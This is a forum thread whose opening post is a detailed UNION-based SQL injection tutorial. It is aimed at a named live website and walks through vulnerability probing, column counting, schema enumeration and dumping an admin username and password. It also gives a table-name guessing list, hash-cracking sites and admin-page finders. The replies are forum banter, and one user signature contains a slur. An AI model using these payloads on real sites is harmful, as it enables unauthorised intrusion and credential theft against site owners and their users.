Page 1 of 3 123 LastLast
Results 1 to 10 of 21
  1. #1
    I Steal Work From This Site!
    I Copy and Paste All Threads From Here To My Site!
    I'm a Raging Homosexual!

    ReBorn's Avatar
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
    Gamer IDs

    Gamertag: ReaL ReBoRN

    Contact info:

    Youtube Channel: www.youtube.com/xtgteam

    Cool [TUT] Super Detailed SQL Injection

    THIS IS FOR EDUCATIONAL PURPOSES ONLY, IM NOT RESPONSIBLE IF YOU GO TO JAIL OR PRISON FOR DOING THIS.

    [center]There are many types of SQL injection when it comes to web hacking
    What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.
    However, what will you do if can't bypass it even though it's vulnerable to SQL injection?
    Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page

    Common Types of SQL injection are:
    Code:
    UNION Based SQL injection
    String Based SQL injection
    Error Based SQL injection
    Double Query SQL injection
    Blind SQL injection
    MsSQL injection

    What we are going to learn today is what we call UNION Based SQL injection
    Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database
    Lets just say that our website will look like this :
    "http://www.site.com/index.php?id=5"
    Notice at the end of the URL, "id=5"
    This is what the query will look like

    SELECT * FROM index
    WHERE id = 5

    lright, now you know a bit of how the website works, let's get hacking

    tep1: Finding the vulnerability in a website
    It'll be like a small puzzle you have to solve. See, you can't just hack a website like http://www.site.com -.-
    To hack a website, you need to scan it yourself by clicking links and find out if there's something like "index.php?id=XXX" where "XXX" is a random integer (number) or string (word).
    Alright now to find sites vulnerable to SQLi is using Google Dorks.
    If you don't know how to use dorks, visit Part 1 of this project to learn all about them
    Once you've found a site vulnerable to SQLi, it's time to execute queries.
    For this tutorial, we'll be using "http://www.leadacidbatteryinfo.org" as an example.

    Try browsing the website and see if you can find links like "index.php?id=xxx"
    It can be anything like "details.php?id=xxx" or "gallery.php?id="
    Just find an address with a number at the end of the URL
    Here's what I found "http://www.leadacidbatteryinfo.org/newsdetail.php?id=51"

    Now to test for vulnerabilities is by ADDING a quote " ' " at the end of the url i.e after the integer or string
    So it'll look like this,


    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51'

    Now you'll notice an error saying

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

    This shows that the website is vulnerable to SQL injection.
    How is this possible?
    Look at the query when we added a quote " ' "
    Step2: Finding the number of columns a website has

    This is the part where most people had commonly misunderstood.
    To get to the point, what we're about to do is find how many columns the website has using NoError/Error statements.
    Alright lets get started.
    The query we'll be using is "order by X--" where "X" is a random integer (number)
    Start by entering "order by 25--"
    Enter it at the end of the URL, so it'll look like this

    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--

    Error, there are no 25 columns, so it'll be less than 25

    Now lets go up to "order by 11--"

    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--

    Hmm, no errors I see. So it's obvious that there could be more than 11 columns
    http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--
    Error! So this means the last number that returned no error is 11
    Therefore, the website has 11 columns
    An error while scanning for number of columns
    While No errors will show the page as normal
    Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement
    First off, we need to know what does "UNION SELECT" means
    Lets say we have 2 tables, "users" and "admin"
    Basically, UNION SELECT is a statement where all these information will be collected as one.
    Look at this query

    SELECT * FROM users
    UNION SELECT * FROM admin

    If we perform the UNION SELECT statement, we can get both users and admin information from their database
    The point is that, UNION SELECT returns our results with the information we need
    If you want to find vulnerable columns, use UNION SELECT
    If you want to find version of database, UNION SELECT
    If you want admin information! use UNION SELECT
    Alright, now that we know something about the Union function, lets continue.

    Take our website that has 11 columns and add a "UNION SELECT" statement.
    Here's how our query will look like

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--


    This is what you would normally do if you use UNION function while SQL injecting a website

    Focus on something like this, "index.php?id=-X UNION SELECT N--"
    Where "X" is a random integer/string and "N" is the number of columns followed by two hyphens " -- " and another hyphen " - " beside "X"

    Step4: Random numbers appear on screen, the next step
    Alright I'm pretty sure you'll find a bunch of numbers showing up on the screen.
    These are known as "vulnerable columns" which states that those vulnerable columns have stored data inside them we need to extract.

    You need to inject the number at the very top (always at the very top)
    So, in this case we have number "8"
    Now you might be asking, what can I do with a vulnerable column?
    Well here's what you can get-- INFORMATION!
    You need a lot of information to study from the website, here are a couple of examples.

    Replace the vulnerable column i.e number 8 with a statement
    Statements:

    @@version, version()
    database(),
    user(),
    @@hostname
    @@datadir

    Their functions
    @@version/version() = find the version of the database
    database() = find the current database
    user() = find the user information
    @@hostname = Current hosting info
    @@datadir = directory of the data of the website

    To find the version of the database in the website, replace the vulnerable column i.e number 8 with "@@version" or "version()
    It'll look like this

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--

    Results:

    5.1.52-log

    So the database version is 5, which is good because it'll be easier to SQL inject the website.
    Note:
    Database version less than 5 "<5" = you need to guess tables (a bit hard work)
    Database version greater than 5 ">5" = easy to inject with another function i.e group_concat

    If you ever want to SQLi a website with version <5, then you can guess the tables with the following below

    Code:
    user
    username
    usernames
    admin
    admins
    users
    manager
    account
    accounts
    member
    login
    logins
    members
    tbl_user
    tbl_users
    tbl_admin
    tbl_admins
    tbl_member
    tbl_members
    tbladmins
    memberlist
    tbluser
    tblusers
    tblmanager
    tblmanagers
    tblclients
    tblservers
    adminuser
    usertbl
    userstbl
    admintbl
    adminstbl
    id
    tuser
    tusers
    uid
    userid
    user_id
    auid
    adminpass
    LoginID
    FirstName
    LastName
    cms_user
    cms_member
    cms_users
    cms_members
    cms_admin
    cms_admins
    user_admin
    user_info
    user_list
    user_login
    user_logins
    user_names
    userrights
    userinfo
    userlist
    webadmin
    webadmins
    Webmaster
    Webuser
    product
    products
    tblproducts
    tblproduct
    tbl_tbadmin
    Adminlogin
    We'll be knowing how to get the tables in the next step.
    But for now, let's see what we can get with other statements
    Lets try all statements at once shall we
    The URL will look like this,

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(database(),version(),@@ datadir,@@hostname,user()),9,1​0,11--

    Results:

    32908_leadacidbatteryinfoorg5.1.52-log/mnt/cluster/data/mysql1.my[email protected]dsite.com
    3

    We have almost every information we have about the website
    Look close here, we used a command "group_concat"
    Here's its function:
    Group_concat = Gets every information at once i.e grouping them with the help of statements. Ex. group_concat(database())
    Note:Group_concat won't work with versions less than 5


    Step5:Getting the table names
    What are tables?
    Tables contain columns and columns contain the data
    It's like a stack (table) of books (columns) and data inside the books (data inside the columns)
    Alright, first lets look up some functions we're gonna use to extract table names (Important)

    group_concat = grouping up data to a specific statement
    table_name = tables names to be shown on screen
    from = location of a specified statement
    information_schema.tables = information in the database with table names in it
    table_schema = tables in a database
    database() = current database in the website
    0x0a = a Hex code that creates a new line for organizing tables in an order

    Now lets combine those functions and make up a query that will give us the table names
    So, here's what our link will look like:

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(table_name,0x0a),9,10,1 1 from information_schema.tables where table_schema=database()--

    In here, we replaced our vulnerable column with "group_concat(table_name,0x0a)"
    and then we added a
    "from information_schema.tables where table_schema=database()--"
    after the last column (excluding the two hyphens after 11)
    Results on table names:

    pdigclicks ,pdigengine ,pdigexcludes ,pdigincludes ,pdigkeywords ,pdiglogs ,pdigsite_page ,pdigsites ,pdigspider ,pdigtempspider ,tbladmin ,tblbanner ,tblbanner_page ,tblfaq ,tblncategory ,tblnews

    Alright now that we've found the tables, what you're gonna have to do is
    that, you have to find tables where user/admin information are stored
    In this case, "tbladmin" seems to be having an admin information stored in it.
    It's all about predicting and expecting what's behind every table you see
    Okay, before proceeding to the next step, make sure you remember the statements we used in order to get the tables.
    Replace and Add the following
    Vulnerable Column = replace with "group_concat(table_name,0x0a)"
    After the last column = Add "from information_schema.tables where table_schema=database()--"
    Also, don't forget about UNION SELECT before the column numbers and the hyphen ( - ) before "X" at index.php?id=X where "X" is a random integer/string


    Step6:Getting Columns from Tables
    Alright obviously, our next task is to get the column names from a specific table which in our case was "tbladmin'
    To do this, we're gonna have to alter some queries a bit
    Now look closely at this syntax:

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(column_name,0x0a),9,10, 11 from information_schema.columns where table_name=0x74626c61646d696e--

    Here's what we replaced:
    table_name = replaced by "column_name"
    information_schema.tables = replaced by "information_schema.columns"
    table_schema = replaced by "table_name"
    database() = replaced by "0x74626c61646d696e--"
    Now that you know the replacements in our syntax, you still might be wondering what's up with the last part where entered "0x74626c61646d696e--"
    First of all, these are known as Hex
    To make a Hex readable, we put "0x" at the beginning
    I'll explain this briefly. So our table name was "tbladmin"
    To enter that table using the syntax above, we have to convert that table name to Hex
    In order to do that, visit this website:
    http://www.swingnote.com/tools/texttohex.php
    It's a text to hex converter
    Enter "tbladmin" in the text box and hit convert
    You'll notice the results will be "74626c61646d696e" (that's the hex)
    Now to make it readable to the website, add "0x" at the beginning
    So it will be:

    0x74626c61646d696e

    Now you know how Hex works, lets look up some functions we replaced and know their uses (Important)

    roup_concat(column_name,0x0a) = grouping the column names we're going to extract
    information_schema.columns = column names stored in database
    table_name = extracting column from a specific table
    0xHEX_Code_Table = Specific table name converted to hex

    Results after extracting column names from tables:

    adminid ,username ,password ,dom

    Now that we've got the columns from that table, it's time to extract the information.
    What we're gonna need here is obviously only the "username" and "password"


    Step7:Getting Data from Columns
    Alright, lets extract the information
    Look closely at the syntax:

    http://www.leadacidbatteryinfo.org/n...ail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,group_concat(username,0x3a,password, 0x0a),9,10,11 from tbladmin--

    Keep this formula-like syntax in your mind whenever you want to extract data from columns

    http://www.site.com/index.php?id=-X UNION SELECT N,group_concat("columnName,0x3a,columnName,0x0a) from "tablename"--

    Where "X" is a random integer/string followed by a hyphen ( - ) while "N" is the number/position of the column and "columnName" is the column you want to extract data while "tablename" is where you extract data from a specific table then two hyphens in the end ( -- )
    CONTINUED BELOW
    Now for revising,
    column names = username, password
    separator = 0x3a (a hex for a colon " : ")
    table name = tbladmin
    Once you execute that syntax, you get the username and password separated by a colon
    Results after executing the syntax:


    ishir:ishir123


    Username: ishir
    Password: ishir123

    Special cases: Hashed Usernames and Passwords
    Most websites will have their passwords hashed as MD5
    In this case you'll need to crack them.
    Using some websites will help you
    Here's a list of Hash cracking websites:

    www.md5decrypter.co.uk/
    www.md5this.com/
    www.md5crack.com/
    http://hashchecker.de/find.html

    An MD5 Hash will look like this:

    21232f297a57a5a743894a0e4a801fc3 -- 32 characters



    Last Step: Finding the admin page and logging in for the goods
    Alright, now that we have our admin login info
    Username: ishir
    Password: ishir123
    It's time to find the login pages
    To do this, you can use Admin Page Finders
    Here's some you can use
    >>Scorpion Admin Page Finder<<
    http://sc0rpion.ir/af/
    >>Outlaw Admin Page Finder<<
    http://www.tools.th3-0utl4ws.com/admin-finder/
    >>Napsterakos Admin Page Finder<<
    http://www.hackforums.net/showthread.php...ight=HaviJ
    >>HaviJ Injector/Cracker and Admin page finder<<
    http://www.hackforums.net/showthread.php...age+finder
    Alright after scanning the website for admin pages, you should see something like this:


    http://www.leadacidbatteryinfo.org/admin/

    Now all you have to do is enter the admin details you extracted from their databases and login as an admin!
    However, some websites could be already hacked and messed up
    Which in our case, this website was already messed up in such a way you can't login as an admin anymore.
    These are just the basics of SQL injection.
    There are lots of websites to hack and more to practice with.[center]

    0 Not allowed! Not allowed!

    JOIN My Website: www.xcodezz.com

  2. #2

    Retired Prophet
    ToxicJew.'s Avatar
    Join Date
    Mar 2011
    Location
    S̢͎̳̞̲͈̪̳̻ͮͩt̟̳̏ͬ̔&#
    Posts
    7,781
    Points
    7,586
         User Info     Contact     Gamer ID
    Join Date
    Mar 2011
    Location
    S̢͎̳̞̲͈̪̳̻ͮͩt̟̳̏ͬ̔&#
    Posts
    7,781
    Points
    7,586

    Contact info:

    Youtube Channel: http://www.youtube.com/kennethbgoodin

    Default

    I moved this to Computer discussion for you. PC Help is for help requests, not tutorials.


    This is actually pretty cool, you never see in-depth tutorials for stuff like this.

    0 Not allowed! Not allowed!
    ส็็็็็็็็็็็็็็็็็็็็็็็็็༼ ຈل͜ຈ༽ส้้้้้้้้้้้้้้้้้้้้้้้ส็็็็็็็็็็็็็็็็็็็็ ็็็็็༼ ຈل͜ຈ༽ส้้้้้้้้้้้้้้้้้้้้้้้

  3. #3
    I Steal Work From This Site!
    I Copy and Paste All Threads From Here To My Site!
    I'm a Raging Homosexual!

    ReBorn's Avatar
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
    Gamer IDs

    Gamertag: ReaL ReBoRN

    Contact info:

    Youtube Channel: www.youtube.com/xtgteam

    Default

    ok thanks

    0 Not allowed! Not allowed!

    JOIN My Website: www.xcodezz.com

  4. #4

    Retired Prophet
    ToxicJew.'s Avatar
    Join Date
    Mar 2011
    Location
    S̢͎̳̞̲͈̪̳̻ͮͩt̟̳̏ͬ̔&#
    Posts
    7,781
    Points
    7,586
         User Info     Contact     Gamer ID
    Join Date
    Mar 2011
    Location
    S̢͎̳̞̲͈̪̳̻ͮͩt̟̳̏ͬ̔&#
    Posts
    7,781
    Points
    7,586

    Contact info:

    Youtube Channel: http://www.youtube.com/kennethbgoodin

    Default

    Even though you didn't make it, still cool.

    0 Not allowed! Not allowed!
    ส็็็็็็็็็็็็็็็็็็็็็็็็็༼ ຈل͜ຈ༽ส้้้้้้้้้้้้้้้้้้้้้้้ส็็็็็็็็็็็็็็็็็็็็ ็็็็็༼ ຈل͜ຈ༽ส้้้้้้้้้้้้้้้้้้้้้้้

  5. #5
    -.-. ..- -. - Equinox's Avatar
    Join Date
    Feb 2012
    Posts
    3,229
    Points
    1,473
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    3,229
    Points
    1,473

    Default

    i was bout to ask if he made this

    0 Not allowed! Not allowed!

  6. #6
    I Steal Work From This Site!
    I Copy and Paste All Threads From Here To My Site!
    I'm a Raging Homosexual!

    ReBorn's Avatar
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
    Gamer IDs

    Gamertag: ReaL ReBoRN

    Contact info:

    Youtube Channel: www.youtube.com/xtgteam

    Default

    Me and JoeNonymous wrote this, all this shit is in the VIP section on my site im just posting it here because i love u guys <3

    0 Not allowed! Not allowed!

    JOIN My Website: www.xcodezz.com

  7. #7
    -.-. ..- -. - Equinox's Avatar
    Join Date
    Feb 2012
    Posts
    3,229
    Points
    1,473
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    3,229
    Points
    1,473

    Default

    hmmmmmm......

    0 Not allowed! Not allowed!

  8. #8
    I Steal Work From This Site!
    I Copy and Paste All Threads From Here To My Site!
    I'm a Raging Homosexual!

    ReBorn's Avatar
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
    Gamer IDs

    Gamertag: ReaL ReBoRN

    Contact info:

    Youtube Channel: www.youtube.com/xtgteam

    Default

    why'd u ditch my site, we were friends, i made u co-owner, then u just dissapeared lol

    0 Not allowed! Not allowed!

    JOIN My Website: www.xcodezz.com

  9. #9
    -.-. ..- -. - Equinox's Avatar
    Join Date
    Feb 2012
    Posts
    3,229
    Points
    1,473
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    3,229
    Points
    1,473

    Default

    i think you got this from the hackforums

    Quote Originally Posted by ReBorn View Post
    why'd u ditch my site, we were friends, i made u co-owner, then u just dissapeared lol
    because you changed me to super moderator from admin, and the usergroups on your site are wack now

    0 Not allowed! Not allowed!

  10. #10
    I Steal Work From This Site!
    I Copy and Paste All Threads From Here To My Site!
    I'm a Raging Homosexual!

    ReBorn's Avatar
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
         User Info     Contact     Gamer ID
    Join Date
    Feb 2012
    Posts
    80
    Points
    510
    Gamer IDs

    Gamertag: ReaL ReBoRN

    Contact info:

    Youtube Channel: www.youtube.com/xtgteam

    Default

    No, i think
    joenonymous did

    0 Not allowed! Not allowed!

    JOIN My Website: www.xcodezz.com

Bookmarks

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
All times are GMT -10. The time now is 06:03 AM.
Powered by vBulletin®
Copyright © 2016 vBulletin Solutions, Inc. All rights reserved.